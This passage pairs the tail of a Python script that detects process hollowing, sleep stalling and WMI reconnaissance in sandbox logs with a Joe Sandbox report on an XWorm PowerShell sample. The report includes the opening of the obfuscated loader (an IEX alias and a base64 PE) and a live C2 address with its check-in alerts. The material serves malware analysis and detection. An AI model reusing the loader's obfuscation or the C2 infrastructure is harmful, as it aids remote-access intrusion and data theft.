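            rows.append((m["src"], m["kind"], m["rest"]))
    return rows


def find_hollowing(rows) -> List[Finding]:
    """Parent writes an MZ header at the image base of a child it spawned itself."""
    # "Process created" detail is '<image> "<command line>"'; keep only the image path.
    spawned = {(src, rest.split(' "', 1)[0].strip())
               for src, kind, rest in rows if kind == "Process created"}
    out = []
    for src, kind, rest in rows:
        if kind != "Memory written":
            continue
        m = _MEMWRITE.match(rest)
        if not m or not m["magic"]:
            continue
        target = m["target"]
        if m["magic"].upper().startswith("4D5A") and (src, target) in spawned:
            out.append(Finding("process_hollowing", src,
                               f"MZ header written at 0x{int(m['base'], 16):X} into {target}"))
    return out


def classify_delay(ms: int) -> Optional[str]:
    """Name the stall type for one delay value, or None when it is ordinary."""
    if ms == TIMESPAN_MAX_MS:
        return "TimeSpan.MaxValue sleep (Int64.MaxValue ticks in ms, effectively infinite)"
    if ms >= STALL_THRESHOLD_MS:
        return f"long sleep of {ms / 60_000:.1f} min"
    return None


def find_stalling(rows) -> List[Finding]:
    out = []
    for src, kind, rest in rows:
        if kind != "Thread delayed":
            continue
        m = _DELAY_MS.search(rest)
        verdict = classify_delay(int(m["ms"])) if m else None
        if verdict:
            out.append(Finding("sleep_stall", src, verdict))
    return out


def find_wmi_recon(rows) -> List[Finding]:
    out = []
    for src, kind, rest in rows:
        if kind != "WMI Queries":
            continue
        m = _WMI_CLASS.search(rest)
        if m and m["cls"] in RECON_WMI_CLASSES:
            out.append(Finding("wmi_recon", src, f"{m['cls']}: {RECON_WMI_CLASSES[m['cls']]}"))
    return out


def triage(lines: List[str]) -> List[Finding]:
    rows = parse_rows(lines)
    return find_hollowing(rows) + find_stalling(rows) + find_wmi_recon(rows)


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.process}: {f.detail}")
```

The hollowing rule deliberately requires both halves, the spawn and the MZ write into that same child by the same parent, so a debugger or an installer that writes into a process it did not create does not trigger it; the delay rule treats the exact TimeSpan.MaxValue value separately from merely long sleeps because it is a stronger indicator of a deliberately stalled thread.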

            Stealing of Sensitive Information

            barindex
Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5916, type: MEMORYSTR

            Remote Access Functionality

            barindex
Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c85102e0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c9328660.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c85102e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.powershell.exe.272c9328660.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4599580483.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6212, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5916, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 121 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Clipboard Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
176.113.115.170.ps1 | 11% | ReversingLabs | Win32.Trojan.Generic | -
176.113.115.170.ps1 | 10% | Virustotal | - | Browse
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
176.113.115.170 | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
18.31.95.13.in-addr.arpa | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
176.113.115.170 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2176808391.00000272C8111000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4602069270.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000000.00000002.2176808391.00000272C8571000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2176808391.00000272C8338000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2176808391.00000272C94E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2197250295.00000272D83CF000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
176.113.115.170 | unknown | Russian Federation | - | 49505 | SELECTELRU | true
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1589116
                                    Start date and time:2025-01-11 10:02:08 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 24s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:9
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:176.113.115.170.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@4/5@1/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 17
                                    • Number of non-executed functions: 8
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 13.95.31.18, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target RegSvcs.exe, PID 5916 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6212 because it is empty
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
04:03:05 | API Interceptor | 8x Sleep call for process: powershell.exe modified
04:03:08 | API Interceptor | 9645329x Sleep call for process: RegSvcs.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
176.113.115.170 | iy2.dat.exe | Get hash | malicious | XWorm | Browse | -
176.113.115.170 | 176.113.115_1.170.ps1 | Get hash | malicious | XWorm | Browse | -
No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SELECTELRU | b0cQukXPAl.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | Mmm7GmDcR4.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | 1In8uYbvZJ.ps1 | Get hash | malicious | Unknown | Browse | 176.113.115.177
SELECTELRU | xCnwCctDWC.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | DLKs2Qeljg.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | fuk7RfLrD3.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | Ljrprfl3BH.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | chu4rWexSX.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | xHj1N8ylIf.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | nYT1CaXH9N.ps1 | Get hash | malicious | Amadey | Browse | 176.113.115.131
No context
No context
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1628158735648508
                                        Encrypted:false
                                        SSDEEP:3:Nlllul5mxllp:NllU4x/
                                        MD5:3A925CB766CE4286E251C26E90B55CE8
                                        SHA1:3FA8EE6E901101A4661723B94D6C9309E281BD28
                                        SHA-256:4E844662CDFFAAD50BA6320DC598EBE0A31619439D0F6AB379DF978FE81C7BF8
                                        SHA-512:F348B4AFD42C262BBED07D6BDEA6EE4B7F5CFA2E18BFA725225584E93251188D9787506C2AFEAC482B606B1EA0341419F229A69FF1E9100B01DE42025F915788
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:@...e................................................@..........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7302356953824454
                                        Encrypted:false
                                        SSDEEP:48:EByDC0lgtrt3CyeU2UG/rukvhkvklCyw/xWlflHJb7SogZobRWlflub7SogZo31:rCRt3C8ThkvhkvCCt5Wlf+H2WlfzHc
                                        MD5:A4DA0F2125ECFDDB82AB308E616BB28B
                                        SHA1:8F45BC05113502D762F3A8C4B9BD1ABEC2D85F68
                                        SHA-256:975E09B64E375693C938A0B796B5BC0178FAC12CF9CD319C16E3A325B8D8A871
                                        SHA-512:9F41857FA5A94A2468C4770E3F444E8C42CAC5A37A370CF60006D0F23955BB3E806ACF59FEE6D0806A4A631938579A5B1649BBDC1E69BE8313BCBCFD6B6BE734
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...J.S.......d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...|)..d......d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2+Z`H...........................^.A.p.p.D.a.t.a...B.V.1.....+Z]H..Roaming.@......EW<2+Z]H..../.....................q...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2+ZYH....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2+ZYH....2......................X.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2+ZYH....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2+ZYH....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2+ZbH....u...........
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6224
                                        Entropy (8bit):3.7302356953824454
                                        Encrypted:false
                                        SSDEEP:48:EByDC0lgtrt3CyeU2UG/rukvhkvklCyw/xWlflHJb7SogZobRWlflub7SogZo31:rCRt3C8ThkvhkvCCt5Wlf+H2WlfzHc
                                        MD5:A4DA0F2125ECFDDB82AB308E616BB28B
                                        SHA1:8F45BC05113502D762F3A8C4B9BD1ABEC2D85F68
                                        SHA-256:975E09B64E375693C938A0B796B5BC0178FAC12CF9CD319C16E3A325B8D8A871
                                        SHA-512:9F41857FA5A94A2468C4770E3F444E8C42CAC5A37A370CF60006D0F23955BB3E806ACF59FEE6D0806A4A631938579A5B1649BBDC1E69BE8313BCBCFD6B6BE734
                                        Malicious:false
                                        Preview:...................................FL..................F.".. ...J.S.......d..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...|)..d......d......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2+Z`H...........................^.A.p.p.D.a.t.a...B.V.1.....+Z]H..Roaming.@......EW<2+Z]H..../.....................q...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2+ZYH....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2+ZYH....2......................X.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2+ZYH....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2+ZYH....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2+ZbH....u...........
                                        File type:ASCII text, with very long lines (65483), with CRLF line terminators
                                        Entropy (8bit):5.168080453235707
                                        TrID:
                                          File name:176.113.115.170.ps1
                                          File size:198'520 bytes
                                          MD5:be3bf7a258359bd7c14c47b3872c9531
                                          SHA1:be71f346690b8f384961bf73b382181c5959aef6
                                          SHA256:ef9aeef4f3b7ea00add3168043c866716d72353065d95b7b7dd981641d91f1ae
                                          SHA512:db1933ebf7c6d98c5a622a3e22bae0ecde77b554c781574e3e5be159677be3269de15cdb1d0b19002374debfa9d1d2ef6ba663e7daa44ea181ee47c9600e68a5
                                          SSDEEP:6144:kkYzSm2MYa1Qdgzkqs5u0uXrRMnfB3sBVy8ZK5HKceYWQLJgvF/9EoQ6GsbwMI5M:brSASP
                                          TLSH:28147C320203BCCA977F3F49A9442EA10C5C643BABA59198FEC509BD65BB510DF39DB4
                                          File Content Preview:.. $t0='IQIQQIEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDANfKUWcAAAAAAAAAAOA
                                          Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T10:03:15.710239+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:15.710239+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:23.606303+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:03:23.819884+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:23.833659+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:03:37.285229+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:37.287933+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:03:45.707942+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:50.755229+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:03:50.757217+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:04.223272+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:04.226679+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:15.728135+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:17.693170+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:17.694906+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:19.363812+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:19.367649+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:19.485113+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:19.487034+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:30.848378+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:30.855002+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:39.832693+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:39.835523+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:45.348369+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:45.351079+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:45.732510+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:47.586686+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:47.588963+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:49.945635+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:49.949996+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:50.075448+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:50.089397+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:50.196498+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:50.203852+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:04:55.313184+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:04:55.315587+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:01.272151+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:01.274287+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:01.395541+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:01.397754+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:07.723496+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:07.725209+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:15.747681+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:21.197542+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
2025-01-11T10:05:21.199697+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.6 | 49718 | 176.113.115.170 | 4413 | TCP
2025-01-11T10:05:24.708086+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.170 | 4413 | 192.168.2.6 | 49718 | TCP
